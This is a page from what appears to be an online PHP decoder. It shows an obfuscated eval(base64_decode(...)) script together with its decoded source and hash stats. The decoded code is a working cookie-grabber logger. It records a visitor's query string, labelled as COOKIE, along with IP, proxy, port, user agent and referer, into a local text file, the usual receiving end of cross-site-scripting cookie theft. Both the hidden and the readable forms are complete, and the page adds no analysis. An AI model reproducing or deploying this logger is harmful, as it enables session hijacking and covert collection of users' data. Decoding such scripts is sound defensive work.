Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("PD9waHAgDQovLyBHZXQgdGhlIElwIGJ5IGNvbnN1bHRpbmcgdGhlIGhlYWR..
Decoded Output download
?>b'<?php
// Get the Ip by consulting the header.
// displays the IP REMOTE_ADDR
// thith is by narmar
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "desconocido"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "desconocido"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "desconocido"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER[\'REMOTE_ADDR\']) && $_SERVER[\'REMOTE_ADDR\'] && strcasecmp($_SERVER[\'REMOTE_ADDR\'], "desconocido"))
$ip = $_SERVER[\'REMOTE_ADDR\'];
else
$ip = "desconocido";
return($ip);
}
function logData()
{
$ipLog="Create By Narmar.txt";
$cookie = $_SERVER[\'QUERY_STRING\'];
$register_globals = (bool) ini_get(\'register_gobals\');
if ($register_globals) $ip = getenv(\'REMOTE_ADDR\');
else $ip = GetIP();
$lenguaje_xd = $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'];
$procolo_xd = $_SERVER[\'SERVER_PROTOCOL\'];
$proxy_xd = $_SERVER[\'HTTP_X_FORWARDED_FOR\'];
$rem_port = $_SERVER[\'REMOTE_PORT\'];
$user_agent = $_SERVER[\'HTTP_USER_AGENT\'];
$rqst_method = $_SERVER[\'METHOD\'];
$rem_host = $_SERVER[\'REMOTE_HOST\'];
$referer = $_SERVER[\'HTTP_REFERER\'];
$ee.= "==================================== Thish Is Write By Narmar ====================================n";
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/bhtmb/i", $ipLog) || preg_match("/bhtmlb/i", $ipLog))
fputs($log, "IP: $ip | Proxy:$proxy_xd | PORT: $rem_port | Protocolo: $procolo_xd | Host: $rem_host | Lenguaje: $lenguaje_xd | Agente: $user_agent | Metodo get/post: $rqst_method | REF: $referer | Fecha{ : } $date | COOKIE: $cookie | create by: $ee <br> ");
else
fputs($log, "IP: $ip | Proxy:$proxy_xd | PORT: $rem_port | Protocolo: $procolo_xd | Host: $rem_host | Lenguaje: $lenguaje_xd | Agente: $user_agent | Metodo get/post: $rqst_method | REF: $referer | Fecha: $date | COOKIE: $cookie nn | create by: $ee nn ");
fclose($log);
}
logData();
?>'
Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("PD9waHAgDQovLyBHZXQgdGhlIElwIGJ5IGNvbnN1bHRpbmcgdGhlIGhlYWRlci4NCi8vIGRpc3BsYXlzIHRoZSBJUCBSRU1PVEVfQUREUg0KLy8gdGhpdGggaXMgYnkgbmFybWFyDQpmdW5jdGlvbiBHZXRJUCgpIA0KeyANCglpZiAoZ2V0ZW52KCJIVFRQX0NMSUVOVF9JUCIpICYmIHN0cmNhc2VjbXAoZ2V0ZW52KCJIVFRQX0NMSUVOVF9JUCIpLCAiZGVzY29ub2NpZG8iKSkgDQoJCSRpcCA9IGdldGVudigiSFRUUF9DTElFTlRfSVAiKTsgDQoJZWxzZSBpZiAoZ2V0ZW52KCJIVFRQX1hfRk9SV0FSREVEX0ZPUiIpICYmIHN0cmNhc2VjbXAoZ2V0ZW52KCJIVFRQX1hfRk9SV0FSREVEX0ZPUiIpLCAiZGVzY29ub2NpZG8iKSkgDQoJCSRpcCA9IGdldGVudigiSFRUUF9YX0ZPUldBUkRFRF9GT1IiKTsgDQoJZWxzZSBpZiAoZ2V0ZW52KCJSRU1PVEVfQUREUiIpICYmIHN0cmNhc2VjbXAoZ2V0ZW52KCJSRU1PVEVfQUREUiIpLCAiZGVzY29ub2NpZG8iKSkgDQoJCSRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsgDQoJZWxzZSBpZiAoaXNzZXQoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pICYmICRfU0VSVkVSWydSRU1PVEVfQUREUiddICYmIHN0cmNhc2VjbXAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10sICJkZXNjb25vY2lkbyIpKSANCgkJJGlwID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107IA0KCWVsc2UgDQoJCSRpcCA9ICJkZXNjb25vY2lkbyI7IA0KCXJldHVybigkaXApOyANCn0gDQoNCg0KDQpmdW5jdGlvbiBsb2dEYXRhKCkgDQp7IA0KCSRpcExvZz0iQ3JlYXRlIEJ5IE5hcm1hci50eHQiOyANCgkkY29va2llID0gJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddOyANCgkkcmVnaXN0ZXJfZ2xvYmFscyA9IChib29sKSBpbmlfZ2V0KCdyZWdpc3Rlcl9nb2JhbHMnKTsgDQoJaWYgKCRyZWdpc3Rlcl9nbG9iYWxzKSAkaXAgPSBnZXRlbnYoJ1JFTU9URV9BRERSJyk7IA0KCWVsc2UgJGlwID0gR2V0SVAoKTsgDQoJDQoJJGxlbmd1YWplX3hkID0gJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ107IA0KCSRwcm9jb2xvX3hkID0gJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddOyANCgkkcHJveHlfeGQgPSAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTsgDQoJJHJlbV9wb3J0ID0gJF9TRVJWRVJbJ1JFTU9URV9QT1JUJ107IA0KCSR1c2VyX2FnZW50ID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOyANCgkkcnFzdF9tZXRob2QgPSAkX1NFUlZFUlsnTUVUSE9EJ107IA0KCSRyZW1faG9zdCA9ICRfU0VSVkVSWydSRU1PVEVfSE9TVCddOyANCgkkcmVmZXJlciA9ICRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsgDQoJJGVlLj0gIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAgIFRoaXNoIElzICBXcml0ZSBCeSBOYXJtYXIgICA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT1uIjsNCgkkZGF0ZT1kYXRlICgibCBkUyBvZiBGIFkgaDppOnMgQSIpOyAgDQoJJGxvZz1mb3BlbigiJGlwTG9nIiwgImErIik7IA0KDQoJaWYgKHByZWdfbWF0Y2goIi9iaHRtYi9pIiwgJGlwTG9nKSB8fCBwcmVnX21hdGNoKCIvYmh0bWxiL2kiLCAkaXBMb2cpKSANCgkJZnB1dHMoJGxvZywgIklQOiAkaXAgfCBQcm94eTokcHJveHlfeGQgfCBQT1JUOiAkcmVtX3BvcnQgfCBQcm90b2NvbG86ICRwcm9jb2xvX3hkIHwgSG9zdDogJHJlbV9ob3N0IHwgTGVuZ3VhamU6ICRsZW5ndWFqZV94ZCB8IEFnZW50ZTogJHVzZXJfYWdlbnQgfCBNZXRvZG8gZ2V0L3Bvc3Q6ICRycXN0X21ldGhvZCB8IFJFRjogJHJlZmVyZXIgIHwgRmVjaGF7IDogfSAkZGF0ZSB8IENPT0tJRTogICRjb29raWUgfCBjcmVhdGUgYnk6ICRlZSAgPGJyPiAiKTsgDQoJZWxzZSANCgkJZnB1dHMoJGxvZywgIklQOiAkaXAgfCBQcm94eTokcHJveHlfeGQgfCBQT1JUOiAkcmVtX3BvcnQgfCBQcm90b2NvbG86ICRwcm9jb2xvX3hkIHwgSG9zdDogJHJlbV9ob3N0IHwgTGVuZ3VhamU6ICRsZW5ndWFqZV94ZCB8IEFnZW50ZTogJHVzZXJfYWdlbnQgfCBNZXRvZG8gZ2V0L3Bvc3Q6ICRycXN0X21ldGhvZCB8IFJFRjogJHJlZmVyZXIgIHwgRmVjaGE6ICRkYXRlIHwgQ09PS0lFOiAgJGNvb2tpZSBubiAgfCBjcmVhdGUgYnk6ICRlZSAgbm4gIik7IA0KCWZjbG9zZSgkbG9nKTsgDQp9IA0KDQpsb2dEYXRhKCk7IA0KDQo/Pg==")); ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 22485a0e7493ee394ec68e451e0f97f9 |
Eval Count | 1 |
Decode Time | 67 ms |